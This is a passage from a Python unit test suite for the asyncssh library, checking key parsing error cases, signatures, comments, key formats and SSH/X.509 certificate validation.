PKCS#8 ASN.1', der_encode(((self.pubkey.pkcs8_oid,\n None), BitString(b'')))),\n ('Invalid PEM header', b'-----BEGIN XXX-----\\n'),\n ('Missing PEM footer', b'-----BEGIN PUBLIC KEY-----\\n'),\n ('Invalid PEM key type',\n b'-----BEGIN XXX PUBLIC KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END XXX PUBLIC KEY-----'),\n ('Invalid PEM Base64',\n b'-----BEGIN PUBLIC KEY-----\\n'\n b'X\\n'\n b'-----END PUBLIC KEY-----'),\n ('Incomplete PEM ASN.1',\n b'-----BEGIN PUBLIC KEY-----\\n'\n b'-----END PUBLIC KEY-----'),\n ('Invalid PKCS#1 ASN.1',\n b'-----BEGIN DSA PUBLIC KEY-----\\n' +\n binascii.b2a_base64(b'\\x30') +\n b'-----END PUBLIC KEY-----'),\n ('Invalid PKCS#1 key data',\n b'-----BEGIN DSA PUBLIC KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END DSA PUBLIC KEY-----'),\n ('Invalid PKCS#8 key data',\n b'-----BEGIN PUBLIC KEY-----\\n' +\n binascii.b2a_base64(der_encode(None)) +\n b'-----END PUBLIC KEY-----'),\n ('Invalid OpenSSH', b'xxx'),\n ('Invalid OpenSSH Base64', b'ssh-dss X'),\n ('Unknown OpenSSH algorithm',\n b'ssh-dss ' + binascii.b2a_base64(String('xxx'))),\n ('Invalid OpenSSH body',\n b'ssh-dss ' + binascii.b2a_base64(String('ssh-dss'))),\n ('Unknown format OpenSSH key',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b'XXX') +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Incomplete OpenSSH key',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b'openssh-key-v1\\0') +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid OpenSSH nkeys',\n b'-----BEGIN OPENSSH PRIVATE KEY-----\\n' +\n binascii.b2a_base64(b''.join(\n (b'openssh-key-v1\\0', String(''), String(''), String(''),\n UInt32(2), String(''), String('')))) +\n b'-----END OPENSSH PRIVATE KEY-----'),\n ('Invalid RFC4716 header', b'---- XXX ----\\n'),\n ('Missing RFC4716 footer', b'---- BEGIN SSH2 PUBLIC KEY ----\\n'),\n ('Invalid RFC4716 header',\n b'---- BEGIN SSH2 PUBLIC KEY ----\\n'\n b'Comment: comment\\n'\n b'XXX:\\\\\\n'\n b'---- END SSH2 PUBLIC KEY ----\\n'),\n ('Invalid RFC4716 Base64',\n b'---- BEGIN SSH2 PUBLIC KEY ----\\n'\n b'X\\n'\n b'---- END SSH2 PUBLIC KEY ----\\n')\n ]\n\n keypair_errors = [\n ('Mismatched certificate',\n (self.privca, self.usercert)),\n ('Invalid signature algorithm string',\n (self.privkey, None, 'xxx')),\n ('Invalid signature algorithm bytes',\n (self.privkey, None, b'xxx'))\n ]\n\n for fmt, data in private_errors:\n with self.subTest('Decode private (%s)' % fmt):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_private_key(data)\n\n for fmt, data in decrypt_errors:\n with self.subTest('Decrypt private (%s)' % fmt):\n with self.assertRaises((asyncssh.KeyEncryptionError,\n asyncssh.KeyImportError)):\n asyncssh.import_private_key(data, 'x')\n\n for fmt, data in public_errors:\n with self.subTest('Decode public (%s)' % fmt):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_public_key(data)\n\n for fmt, key in keypair_errors:\n with self.subTest('Load keypair (%s)' % fmt):\n with self.assertRaises(ValueError):\n asyncssh.load_keypairs([key])\n\n def check_sshkey_base_errors(self):\n \"\"\"Check SSHKey base class errors\"\"\"\n\n key = SSHKey(None)\n\n with self.subTest('SSHKey base class errors'):\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_pkcs1_private()\n\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_pkcs1_public()\n\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_pkcs8_private()\n\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_pkcs8_public()\n\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_ssh_private()\n\n with self.assertRaises(asyncssh.KeyExportError):\n key.encode_ssh_public()\n\n def check_sign_and_verify(self):\n \"\"\"Check key signing and verification\"\"\"\n\n with self.subTest('Sign/verify test'):\n data = os.urandom(8)\n\n for cert in (None, self.usercert, self.userx509):\n keypair = asyncssh.load_keypairs([(self.privkey, cert)])[0]\n\n for sig_alg in keypair.sig_algorithms:\n with self.subTest('Good signature', sig_alg=sig_alg):\n try:\n keypair.set_sig_algorithm(sig_alg)\n sig = keypair.sign(data)\n\n with self.subTest('Good signature'):\n self.assertTrue(self.pubkey.verify(data, sig))\n\n badsig = bytearray(sig)\n badsig[-1] ^= 0xff\n badsig = bytes(badsig)\n\n with self.subTest('Bad signature'):\n self.assertFalse(self.pubkey.verify(data,\n badsig))\n except UnsupportedAlgorithm: # pragma: no cover\n pass\n\n with self.subTest('Missing signature'):\n self.assertFalse(self.pubkey.verify(\n data, String(self.pubkey.sig_algorithms[0])))\n\n with self.subTest('Empty signature'):\n self.assertFalse(self.pubkey.verify(\n data, String(self.pubkey.sig_algorithms[0]) + String(b'')))\n\n with self.subTest('Sign with bad algorithm'):\n with self.assertRaises(ValueError):\n self.privkey.sign(data, b'xxx')\n\n with self.subTest('Verify with bad algorithm'):\n self.assertFalse(self.pubkey.verify(\n data, String('xxx') + String('')))\n\n with self.subTest('Sign with public key'):\n with self.assertRaises(ValueError):\n self.pubkey.sign(data, self.pubkey.sig_algorithms[0])\n\n def check_set_certificate(self):\n \"\"\"Check setting certificate on existing keypair\"\"\"\n\n keypair = asyncssh.load_keypairs([self.privkey])[0]\n keypair.set_certificate(self.usercert)\n self.assertEqual(keypair.public_data, self.usercert.public_data)\n\n keypair = asyncssh.load_keypairs(self.privkey)[0]\n keypair = asyncssh.load_keypairs((keypair, self.usercert))[0]\n self.assertEqual(keypair.public_data, self.usercert.public_data)\n\n key2 = get_test_key('ssh-rsa', 1)\n\n with self.assertRaises(ValueError):\n asyncssh.load_keypairs((key2, self.usercert))\n\n def check_comment(self):\n \"\"\"Check getting and setting comments\"\"\"\n\n with self.subTest('Comment test'):\n self.assertEqual(self.privkey.get_comment_bytes(), b'comment')\n self.assertEqual(self.privkey.get_comment(), 'comment')\n self.assertEqual(self.pubkey.get_comment_bytes(), b'pub_comment')\n self.assertEqual(self.pubkey.get_comment(), 'pub_comment')\n\n key = asyncssh.import_private_key(\n self.privkey.export_private_key('openssh'))\n self.assertEqual(key.get_comment_bytes(), b'comment')\n self.assertEqual(key.get_comment(), 'comment')\n\n key.set_comment('new_comment')\n self.assertEqual(key.get_comment_bytes(), b'new_comment')\n self.assertEqual(key.get_comment(), 'new_comment')\n\n key.set_comment(b'new_comment')\n self.assertEqual(key.get_comment_bytes(), b'new_comment')\n self.assertEqual(key.get_comment(), 'new_comment')\n\n key.set_comment(b'\\xff')\n self.assertEqual(key.get_comment_bytes(), b'\\xff')\n with self.assertRaises(UnicodeDecodeError):\n key.get_comment()\n\n cert = asyncssh.import_certificate(\n self.usercert.export_certificate())\n\n cert.set_comment(b'\\xff')\n self.assertEqual(cert.get_comment_bytes(), b'\\xff')\n with self.assertRaises(UnicodeDecodeError):\n cert.get_comment()\n\n if self.x509_supported:\n cert = asyncssh.import_certificate(\n self.userx509.export_certificate())\n\n cert.set_comment(b'\\xff')\n self.assertEqual(cert.get_comment_bytes(), b'\\xff')\n with self.assertRaises(UnicodeDecodeError):\n cert.get_comment()\n\n for fmt in ('openssh', 'rfc4716'):\n key = asyncssh.import_public_key(\n self.pubkey.export_public_key(fmt))\n self.assertEqual(key.get_comment_bytes(), b'pub_comment')\n self.assertEqual(key.get_comment(), 'pub_comment')\n\n key = asyncssh.import_public_key(\n self.pubca.export_public_key(fmt))\n self.assertEqual(key.get_comment_bytes(), None)\n self.assertEqual(key.get_comment(), None)\n\n key.set_comment('new_comment')\n self.assertEqual(key.get_comment_bytes(), b'new_comment')\n self.assertEqual(key.get_comment(), 'new_comment')\n\n key.set_comment(b'new_comment')\n self.assertEqual(key.get_comment_bytes(), b'new_comment')\n self.assertEqual(key.get_comment(), 'new_comment')\n\n for fmt in ('openssh', 'rfc4716'):\n cert = asyncssh.import_certificate(\n self.usercert.export_certificate(fmt))\n self.assertEqual(cert.get_comment_bytes(), b'user_comment')\n self.assertEqual(cert.get_comment(), 'user_comment')\n\n cert = self.privca.generate_user_certificate(\n self.pubkey, 'name', principals='name1,name2',\n comment='cert_comment')\n self.assertEqual(cert.principals, ['name1', 'name2'])\n self.assertEqual(cert.get_comment_bytes(), b'cert_comment')\n self.assertEqual(cert.get_comment(), 'cert_comment')\n\n cert = asyncssh.import_certificate(\n self.hostcert.export_certificate(fmt))\n self.assertEqual(cert.get_comment_bytes(), b'host_comment')\n self.assertEqual(cert.get_comment(), 'host_comment')\n\n cert = self.privca.generate_host_certificate(\n self.pubkey, 'name', principals=['name1', 'name2'],\n comment=b'\\xff')\n self.assertEqual(cert.principals, ['name1', 'name2'])\n self.assertEqual(cert.get_comment_bytes(), b'\\xff')\n with self.assertRaises(UnicodeDecodeError):\n cert.get_comment()\n\n cert.set_comment('new_comment')\n self.assertEqual(cert.get_comment_bytes(), b'new_comment')\n self.assertEqual(cert.get_comment(), 'new_comment')\n\n cert.set_comment(b'new_comment')\n self.assertEqual(cert.get_comment_bytes(), b'new_comment')\n self.assertEqual(cert.get_comment(), 'new_comment')\n\n if self.x509_supported:\n for fmt in ('openssh', 'der', 'pem'):\n cert = asyncssh.import_certificate(\n self.rootx509.export_certificate(fmt))\n self.assertEqual(cert.get_comment_bytes(), None)\n self.assertEqual(cert.get_comment(), None)\n\n cert = self.privca.generate_x509_ca_certificate(\n self.pubkey, 'OU=root', comment='ca_comment')\n self.assertEqual(cert.get_comment_bytes(), b'ca_comment')\n self.assertEqual(cert.get_comment(), 'ca_comment')\n\n cert = asyncssh.import_certificate(\n self.userx509.export_certificate(fmt))\n self.assertEqual(cert.get_comment_bytes(), b'user_comment')\n self.assertEqual(cert.get_comment(), 'user_comment')\n\n cert = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=user', 'OU=root',\n comment='user_comment')\n self.assertEqual(cert.get_comment_bytes(), b'user_comment')\n self.assertEqual(cert.get_comment(), 'user_comment')\n\n cert = asyncssh.import_certificate(\n self.hostx509.export_certificate(fmt))\n self.assertEqual(cert.get_comment_bytes(), b'host_comment')\n self.assertEqual(cert.get_comment(), 'host_comment')\n\n cert = self.privca.generate_x509_host_certificate(\n self.pubkey, 'OU=host', 'OU=root',\n comment='host_comment')\n self.assertEqual(cert.get_comment_bytes(), b'host_comment')\n self.assertEqual(cert.get_comment(), 'host_comment')\n\n cert.set_comment('new_comment')\n self.assertEqual(cert.get_comment_bytes(), b'new_comment')\n self.assertEqual(cert.get_comment(), 'new_comment')\n\n cert.set_comment(b'new_comment')\n self.assertEqual(cert.get_comment_bytes(), b'new_comment')\n self.assertEqual(cert.get_comment(), 'new_comment')\n\n keypair = asyncssh.load_keypairs([self.privkey])[0]\n self.assertEqual(keypair.get_comment_bytes(), b'comment')\n self.assertEqual(keypair.get_comment(), 'comment')\n\n keypair.set_comment('new_comment')\n self.assertEqual(keypair.get_comment_bytes(), b'new_comment')\n self.assertEqual(keypair.get_comment(), 'new_comment')\n\n keypair.set_comment(b'new_comment')\n self.assertEqual(keypair.get_comment_bytes(), b'new_comment')\n self.assertEqual(keypair.get_comment(), 'new_comment')\n\n keypair.set_comment(b'\\xff')\n self.assertEqual(keypair.get_comment_bytes(), b'\\xff')\n with self.assertRaises(UnicodeDecodeError):\n keypair.get_comment()\n\n priv = asyncssh.read_private_key('priv')\n priv.set_comment(None)\n\n keypair = asyncssh.load_keypairs((priv, self.pubkey))[0]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n keypair = asyncssh.load_keypairs((priv, self.usercert))[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n keypair = asyncssh.load_keypairs(priv, None, self.usercert)[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n pubdata = self.pubkey.export_public_key()\n keypair = asyncssh.load_keypairs((priv, pubdata))[0]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n certdata = self.usercert.export_certificate()\n keypair = asyncssh.load_keypairs((priv, certdata))[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n keypair = asyncssh.load_keypairs(priv, None, certdata)[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n priv.write_private_key('key')\n\n keypair = asyncssh.load_keypairs('key')[0]\n self.assertEqual(keypair.get_comment(), 'key')\n\n keypair = asyncssh.load_keypairs(('key', 'sshpub'))[0]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n keypair = asyncssh.load_keypairs(('key', 'usercert'))[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n keypair = asyncssh.load_keypairs('key', None, 'usercert')[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n self.pubkey.write_public_key('key.pub')\n\n keypair = asyncssh.load_keypairs('key')[0]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n self.usercert.write_certificate('key-cert.pub')\n\n keypair = asyncssh.load_keypairs('key')[0]\n self.assertEqual(keypair.get_comment(), 'user_comment')\n\n keypair = asyncssh.load_keypairs('key')[1]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n keypair = asyncssh.load_keypairs(('key', None))[0]\n self.assertEqual(keypair.get_comment(), 'pub_comment')\n\n key2 = get_test_key('ssh-rsa', 1)\n\n with self.assertRaises(ValueError):\n asyncssh.load_keypairs((key2, 'pub'))\n\n for f in ('key', 'key.pub', 'key-cert.pub'):\n os.remove(f)\n\n def check_pkcs1_private(self):\n \"\"\"Check PKCS#1 private key format\"\"\"\n\n with self.subTest('Import PKCS#1 PEM private'):\n self.import_pkcs1_private('pem')\n\n with self.subTest('Export PKCS#1 PEM private'):\n self.export_pkcs1_private('pem')\n\n with self.subTest('Import PKCS#1 DER private'):\n self.import_pkcs1_private('der')\n\n with self.subTest('Export PKCS#1 DER private'):\n self.export_pkcs1_private('der')\n\n for cipher, args, legacy in pkcs1_ciphers:\n legacy_args = _openssl_legacy if legacy else ''\n\n with self.subTest('Import PKCS#1 PEM private (%s)' % cipher):\n self.import_pkcs1_private('pem', cipher, legacy_args + args)\n\n with self.subTest('Export PKCS#1 PEM private (%s)' % cipher):\n self.export_pkcs1_private('pem', cipher, legacy_args)\n\n def check_pkcs1_public(self):\n \"\"\"Check PKCS#1 public key format\"\"\"\n\n with self.subTest('Import PKCS#1 PEM public'):\n self.import_pkcs1_public('pem')\n\n with self.subTest('Export PKCS#1 PEM public'):\n self.export_pkcs1_public('pem')\n\n with self.subTest('Import PKCS#1 DER public'):\n self.import_pkcs1_public('der')\n\n with self.subTest('Export PKCS#1 DER public'):\n self.export_pkcs1_public('der')\n\n def check_pkcs8_private(self):\n \"\"\"Check PKCS#8 private key format\"\"\"\n\n with self.subTest('Import PKCS#8 PEM private'):\n self.import_pkcs8_private('pem')\n\n with self.subTest('Export PKCS#8 PEM private'):\n self.export_pkcs8_private('pem')\n\n with self.subTest('Import PKCS#8 DER private'):\n self.import_pkcs8_private('der')\n\n with self.subTest('Export PKCS#8 DER private'):\n self.export_pkcs8_private('der')\n\n for cipher, hash_alg, pbe_version, args, \\\n openssl_ok, legacy in pkcs8_ciphers:\n legacy_args = _openssl_legacy if legacy else ''\n\n with self.subTest('Import PKCS#8 PEM private (%s-%s-v%s)' %\n (cipher, hash_alg, pbe_version)):\n self.import_pkcs8_private('pem', openssl_ok, cipher,\n hash_alg, pbe_version,\n legacy_args + args)\n\n with self.subTest('Export PKCS#8 PEM private (%s-%s-v%s)' %\n (cipher, hash_alg, pbe_version)):\n self.export_pkcs8_private('pem', openssl_ok, cipher,\n hash_alg, pbe_version, legacy_args)\n\n with self.subTest('Import PKCS#8 DER private (%s-%s-v%s)' %\n (cipher, hash_alg, pbe_version)):\n self.import_pkcs8_private('der', openssl_ok, cipher,\n hash_alg, pbe_version,\n legacy_args + args)\n\n with self.subTest('Export PKCS#8 DER private (%s-%s-v%s)' %\n (cipher, hash_alg, pbe_version)):\n self.export_pkcs8_private('der', openssl_ok, cipher,\n hash_alg, pbe_version, legacy_args)\n\n if self.single_cipher:\n break\n\n def check_pkcs8_public(self):\n \"\"\"Check PKCS#8 public key format\"\"\"\n\n with self.subTest('Import PKCS#8 PEM public'):\n self.import_pkcs8_public('pem')\n\n with self.subTest('Export PKCS#8 PEM public'):\n self.export_pkcs8_public('pem')\n\n with self.subTest('Import PKCS#8 DER public'):\n self.import_pkcs8_public('der')\n\n with self.subTest('Export PKCS#8 DER public'):\n self.export_pkcs8_public('der')\n\n def check_openssh_private(self):\n \"\"\"Check OpenSSH private key format\"\"\"\n\n with self.subTest('Import OpenSSH private'):\n self.import_openssh_private()\n\n with self.subTest('Export OpenSSH private'):\n self.export_openssh_private()\n\n if bcrypt_available: # pragma: no branch\n for cipher, openssh_ok in openssh_ciphers:\n with self.subTest('Import OpenSSH private (%s)' % cipher):\n self.import_openssh_private(openssh_ok, cipher)\n\n with self.subTest('Export OpenSSH private (%s)' % cipher):\n self.export_openssh_private(openssh_ok, cipher)\n\n if self.single_cipher:\n break\n\n def check_openssh_public(self):\n \"\"\"Check OpenSSH public key format\"\"\"\n\n with self.subTest('Import OpenSSH public'):\n self.import_openssh_public()\n\n with self.subTest('Export OpenSSH public'):\n self.export_openssh_public()\n\n def check_openssh_certificate(self):\n \"\"\"Check OpenSSH certificate format\"\"\"\n\n with self.subTest('Import OpenSSH user certificate'):\n self.import_openssh_certificate(CERT_TYPE_USER, 'usercert')\n\n with self.subTest('Export OpenSSH user certificate'):\n self.export_openssh_certificate(CERT_TYPE_USER, self.usercert)\n\n with self.subTest('Import OpenSSH host certificate'):\n self.import_openssh_certificate(CERT_TYPE_HOST, 'hostcert')\n\n with self.subTest('Export OpenSSH host certificate'):\n self.export_openssh_certificate(CERT_TYPE_HOST, self.hostcert)\n\n def check_rfc4716_public(self):\n \"\"\"Check RFC4716 public key format\"\"\"\n\n with self.subTest('Import RFC4716 public'):\n self.import_rfc4716_public()\n\n with self.subTest('Export RFC4716 public'):\n self.export_rfc4716_public()\n\n def check_rfc4716_certificate(self):\n \"\"\"Check RFC4716 certificate format\"\"\"\n\n with self.subTest('Import RFC4716 user certificate'):\n self.import_rfc4716_certificate(CERT_TYPE_USER, 'usercert')\n\n with self.subTest('Export RFC4716 user certificate'):\n self.export_rfc4716_certificate(CERT_TYPE_USER, self.usercert)\n\n with self.subTest('Import RFC4716 host certificate'):\n self.import_rfc4716_certificate(CERT_TYPE_HOST, 'hostcert')\n\n with self.subTest('Export RFC4716 host certificate'):\n self.export_rfc4716_certificate(CERT_TYPE_HOST, self.hostcert)\n\n def check_der_x509_certificate(self):\n \"\"\"Check DER X.509 certificate format\"\"\"\n\n with self.subTest('Import DER X.509 user certificate'):\n self.import_der_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Export DER X.509 user certificate'):\n self.export_der_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Import DER X.509 host certificate'):\n self.import_der_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n with self.subTest('Export DER X.509 host certificate'):\n self.export_der_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n def check_pem_x509_certificate(self):\n \"\"\"Check PEM X.509 certificate format\"\"\"\n\n with self.subTest('Import PEM X.509 user certificate'):\n self.import_pem_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Export PEM X.509 user certificate'):\n self.export_pem_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Import PEM X.509 host certificate'):\n self.import_pem_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n with self.subTest('Export PEM X.509 host certificate'):\n self.export_pem_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n with self.subTest('Import PEM X.509 trusted user certificate'):\n self.import_pem_x509_certificate(CERT_TYPE_USER, self.userx509,\n trusted=True)\n\n with self.subTest('Import PEM X.509 trusted host certificate'):\n self.import_pem_x509_certificate(CERT_TYPE_HOST, self.hostx509,\n trusted=True)\n\n def check_openssh_x509_certificate(self):\n \"\"\"Check OpenSSH X.509 certificate format\"\"\"\n\n with self.subTest('Import OpenSSH X.509 user certificate'):\n self.import_openssh_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Export OpenSSH X.509 user certificate'):\n self.export_openssh_x509_certificate(CERT_TYPE_USER, self.userx509)\n\n with self.subTest('Import OpenSSH X.509 host certificate'):\n self.import_openssh_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n with self.subTest('Export OpenSSH X.509 host certificate'):\n self.export_openssh_x509_certificate(CERT_TYPE_HOST, self.hostx509)\n\n def check_certificate_options(self):\n \"\"\"Check SSH certificate options\"\"\"\n\n cert = self.privca.generate_user_certificate(\n self.pubkey, 'name', force_command='command',\n source_address=['1.2.3.4'], permit_x11_forwarding=False,\n permit_agent_forwarding=False,\n permit_port_forwarding=False, permit_pty=False,\n permit_user_rc=False, touch_required=False)\n\n cert.write_certificate('cert')\n self.check_certificate(CERT_TYPE_USER, 'openssh')\n\n for valid_after, valid_before in ((0, 1.),\n (datetime.now(), '+1m'),\n ('20160101', '20160102'),\n ('20160101000000', '20160102235959'),\n ('now', '1w2d3h4m5s'),\n ('-52w', '+52w')):\n\n cert = self.privca.generate_host_certificate(\n self.pubkey, 'name', valid_after=valid_after,\n valid_before=valid_before)\n\n cert.write_certificate('cert')\n cert2 = asyncssh.read_certificate('cert')\n self.assertEqual(cert2.public_data, cert.public_data)\n\n def check_certificate_errors(self, cert_type):\n \"\"\"Check general and OpenSSH certificate error cases\"\"\"\n\n with self.subTest('Non-ASCII certificate'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('\\u0080\\n')\n\n with self.subTest('Invalid SSH format'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('xxx\\n')\n\n with self.subTest('Invalid certificate packetization'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate(\n b'xxx ' + binascii.b2a_base64(b'\\x00'))\n\n with self.subTest('Invalid certificate algorithm'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate(\n b'xxx ' + binascii.b2a_base64(String(b'xxx')))\n\n with self.subTest('Invalid certificate critical option'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n options={b'xxx': b''})\n asyncssh.import_certificate(cert)\n\n with self.subTest('Ignored certificate extension'):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n extensions={b'xxx': b''})\n self.assertIsNotNone(asyncssh.import_certificate(cert))\n\n with self.subTest('Invalid certificate signature'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n bad_signature=True)\n asyncssh.import_certificate(cert)\n\n with self.subTest('Invalid characters in certificate key ID'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n key_id=b'\\xff')\n asyncssh.import_certificate(cert)\n\n with self.subTest('Invalid characters in certificate principal'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, (b'\\xff',))\n asyncssh.import_certificate(cert)\n\n if cert_type == CERT_TYPE_USER:\n with self.subTest('Invalid characters in force-command'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n options={'force-command':\n String(b'\\xff')})\n asyncssh.import_certificate(cert)\n\n with self.subTest('Invalid characters in source-address'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n options={'source-address':\n String(b'\\xff')})\n asyncssh.import_certificate(cert)\n\n with self.subTest('Invalid IP network in source-address'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n options={'source-address':\n String('1.1.1.256')})\n asyncssh.import_certificate(cert)\n\n with self.subTest('Invalid certificate type'):\n with self.assertRaises(asyncssh.KeyImportError):\n cert = self.make_certificate(0, self.pubkey,\n self.privca, ('name',))\n asyncssh.import_certificate(cert)\n\n with self.subTest('Mismatched certificate type'):\n with self.assertRaises(ValueError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',))\n cert = asyncssh.import_certificate(cert)\n self.validate_openssh(cert, cert_type ^ 3, 'name')\n\n with self.subTest('Certificate not yet valid'):\n with self.assertRaises(ValueError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n valid_after=0xffffffffffffffff)\n cert = asyncssh.import_certificate(cert)\n self.validate_openssh(cert, cert_type, 'name')\n\n with self.subTest('Certificate expired'):\n with self.assertRaises(ValueError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',),\n valid_before=0)\n cert = asyncssh.import_certificate(cert)\n self.validate_openssh(cert, cert_type, 'name')\n\n with self.subTest('Certificate principal mismatch'):\n with self.assertRaises(ValueError):\n cert = self.make_certificate(cert_type, self.pubkey,\n self.privca, ('name',))\n cert = asyncssh.import_certificate(cert)\n self.validate_openssh(cert, cert_type, 'name2')\n\n for fmt in ('der', 'pem', 'xxx'):\n with self.subTest('Invalid certificate export format', fmt=fmt):\n with self.assertRaises(asyncssh.KeyExportError):\n self.usercert.export_certificate(fmt)\n\n def check_x509_certificate_errors(self):\n \"\"\"Check X.509 certificate error cases\"\"\"\n\n with self.subTest('Invalid DER format'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate(b'\\x30\\x00')\n\n with self.subTest('Invalid DER format in certificate list'):\n with self.assertRaises(asyncssh.KeyImportError):\n write_file('certlist', b'\\x30\\x00')\n asyncssh.read_certificate_list('certlist')\n\n with self.subTest('Invalid PEM format'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('-----')\n\n with self.subTest('Invalid PEM certificate type'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('-----BEGIN XXX CERTIFICATE-----\\n'\n '-----END XXX CERTIFICATE-----\\n')\n\n with self.subTest('Missing PEM footer'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('-----BEGIN CERTIFICATE-----\\n')\n\n with self.subTest('Invalid PEM Base64'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('-----BEGIN CERTIFICATE-----\\n'\n 'X\\n'\n '-----END CERTIFICATE-----\\n')\n\n with self.subTest('Invalid PEM trusted certificate'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate(\n '-----BEGIN TRUSTED CERTIFICATE-----\\n'\n 'MA==\\n'\n '-----END TRUSTED CERTIFICATE-----\\n')\n\n with self.subTest('Invalid PEM certificate data'):\n with self.assertRaises(asyncssh.KeyImportError):\n asyncssh.import_certificate('-----BEGIN CERTIFICATE-----\\n'\n 'XXXX\\n'\n '-----END CERTIFICATE-----\\n')\n\n with self.subTest('Certificate not yet valid'):\n cert = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=user', 'OU=root',\n valid_after=0xfffffffffffffffe)\n\n with self.assertRaises(ValueError):\n self.validate_x509(cert)\n\n with self.subTest('Certificate expired'):\n cert = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=user', 'OU=root', valid_before=1)\n\n with self.assertRaises(ValueError):\n self.validate_x509(cert)\n\n with self.subTest('Certificate principal mismatch'):\n cert = self.privca.generate_x509_user_certificate(\n self.pubkey, 'OU=user', 'OU=root', principals=['name'])\n\n with self.assertRaises(ValueError):\n self.validate_x509(cert, 'name2')\n\n for fmt in ('rfc4716', 'xxx'):\n with self.subTest('Invalid certificate export format', fmt=fmt):\n with self.assertRaises(asyncssh.KeyExportError):\n self.userx509.export_certificate(fmt)\n\n with self.subTest('Empty certificate chain'):\n with self.assertRaises(asyncssh.KeyImportError):\n decode_ssh_certificate(String('x509v3-ssh-rsa') +\n UInt32(0) + UInt32(0))\n\n def check_x509_certificate_subject(self):\n \"\"\"Check X.509 certificate subject cases\"\"\"\n\n with self.subTest('Missing certificate subject algorithm'):\n with self.assertRaises(asyncssh.KeyImportError):\n import_certificate_subject('xxx')\n\n with self.subTest('Unknown certificate subject algorithm'):\n with self.assertRaises(asyncssh.KeyImportError):\n import_certificate_subject('xxx subject=OU=name')\n\n with self.subTest('Invalid certificate subject'):\n with self.assertRaises(asyncssh.KeyImportError):\n import_certificate_subject('x509v3-ssh-rsa xxx')\n\n subject = import_certificate_subject('x509v3-ssh-rsa subject=OU=name')\n self.assertEqual(subject, 'OU=name')\n\n def test_keys(self):\n \"\"\"Check keys and certificates\"\"\"\n\n for alg_name, kwargs in self.generate_args:\n with self.subTest(alg_name=alg_name, **kwargs):\n self.privkey = get_test_key(\n alg_name, comment='comment', **kwargs)\n self.privkey.write_private_key('priv', self.base_format)\n\n self.pubkey = self.privkey.convert_to_public()\n self.pubkey.set_comment('pub_comment')\n\n self.pubkey.write_public_key('pub', self.base_format)\n self.pubkey.write_public_key('sshpub', 'openssh')\n\n self.privca = get_test_key(alg_name, 1, **kwargs)\n self.privca.write_private_key('privca', self.base_format)\n\n self.pubca = self.privca.convert_to_public()\n self.pubca.write_public_key('pubca', self.base_format)\n\n self.usercert = 